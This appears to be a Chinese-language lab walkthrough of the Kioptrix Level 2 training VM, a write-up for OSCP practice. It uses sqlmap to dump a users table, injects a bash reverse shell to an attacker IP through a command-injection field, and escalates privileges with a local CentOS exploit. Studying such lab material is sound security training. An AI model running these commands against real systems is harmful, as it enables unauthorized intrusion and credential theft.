Kioptrix Level2

目标IP:192.168.11.176

端口开放情况:

Kioptrix Level2_第1张图片

先从80端口入手

Kioptrix Level2_第2张图片

  1. 使用抓包--爆破 暂不使用
  2. 测试注入
  3. 目录扫描

Kioptrix Level2_第3张图片

使用post传值,我们抓包后放到sqlmap中测试

Kioptrix Level2_第4张图片

添加*号优先测试

Kioptrix Level2_第5张图片

sqlmap -r q.txt --level 5 --risk 3

逐步跑出用户名和密码

sqlmap -r q.txt --level 5 --risk 3 -D webapp -T users -C "username,password" --dump

 

Kioptrix Level2_第6张图片

然后就是很明显命令注入

Kioptrix Level2_第7张图片

在框内输入| bash -i >& /dev/tcp/192.168.11.177/1234 0>&1

使用nc 监听1234端口

Kioptrix Level2_第8张图片

开始提权

  1. sudo -l 需要密码 
  2. lsb_release

4.5版本的Centos 搜索一下提权脚本

Kioptrix Level2_第9张图片

根据提示

Kioptrix Level2_第10张图片

直接传到靶机中gcc编译后运行就可以

Kioptrix Level2_第11张图片

/var/mail/root

Kioptrix Level2_第12张图片

 

你可能感兴趣的:(OSCP靶机)